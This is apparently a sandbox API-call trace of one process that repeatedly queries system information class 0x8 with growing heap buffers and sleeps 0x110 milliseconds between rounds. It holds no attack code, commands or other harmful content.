[0232.597] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0232.597] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0232.598] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.598] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0232.598] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0232.599] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.599] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0232.599] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0232.599] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.599] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0232.599] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0232.600] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.600] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0232.600] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.600] Sleep (dwMilliseconds=0x110) [0232.608] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0232.608] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0232.609] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.609] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0232.609] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0232.609] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.609] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0232.610] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0232.610] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.610] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0232.610] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0232.611] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.611] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0232.611] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.611] Sleep (dwMilliseconds=0x110) [0232.627] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0232.627] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0232.628] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.628] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0232.628] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0232.629] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.629] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0232.629] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0232.630] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.630] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0232.630] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0232.631] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.631] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0232.631] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.631] Sleep (dwMilliseconds=0x110) [0232.658] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0232.658] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0232.658] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.658] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0232.658] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0232.659] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.659] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0232.659] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0232.659] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.659] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0232.659] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0232.660] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.660] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0232.660] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.660] Sleep (dwMilliseconds=0x110) [0232.674] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0232.674] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0232.674] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.674] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0232.674] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0232.675] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.675] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0232.675] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0232.675] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.675] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0232.675] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0232.676] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.676] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0232.676] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.676] Sleep (dwMilliseconds=0x110) [0232.685] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0232.685] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0232.685] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.689] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0232.689] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0232.689] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.689] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0232.689] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0232.690] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.690] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0232.690] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0232.691] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.691] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0232.691] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.691] Sleep (dwMilliseconds=0x110) [0232.702] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0232.702] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0232.703] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.703] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0232.703] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0232.703] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.703] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0232.703] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0232.703] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.704] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0232.704] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0232.704] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.704] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0232.705] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.705] Sleep (dwMilliseconds=0x110) [0232.717] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0232.717] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0232.718] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.718] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0232.718] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0232.718] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.718] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0232.718] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0232.719] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.719] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0232.719] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0232.720] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.720] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0232.720] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.720] Sleep (dwMilliseconds=0x110) [0232.736] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0232.736] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0232.737] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.737] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0232.737] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0232.738] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.738] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0232.738] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0232.739] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.739] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0232.739] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0232.740] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.740] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0232.740] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.740] Sleep (dwMilliseconds=0x110) [0232.752] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0232.752] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0232.753] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.753] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0232.753] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0232.753] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.753] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0232.753] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0232.754] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.754] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0232.754] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0232.755] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.755] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0232.755] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.755] Sleep (dwMilliseconds=0x110) [0232.764] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0232.764] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0232.765] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.765] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0232.765] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0232.765] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.765] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0232.765] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0232.766] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.766] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0232.766] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0232.766] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.766] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0232.767] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.767] Sleep (dwMilliseconds=0x110) [0232.780] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0232.780] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0232.781] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.781] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0232.781] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0232.782] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.782] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0232.782] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0232.782] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.782] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0232.783] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0232.783] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.783] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0232.784] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.784] Sleep (dwMilliseconds=0x110) [0232.800] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0232.800] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0232.800] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.801] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0232.801] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0232.801] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.801] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0232.801] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0232.802] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.802] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0232.802] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0232.802] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.802] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0232.803] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.803] Sleep (dwMilliseconds=0x110) [0232.809] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0232.809] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0232.810] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.810] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0232.810] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0232.811] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.811] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0232.812] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0232.812] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.812] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0232.812] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0232.813] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0232.813] 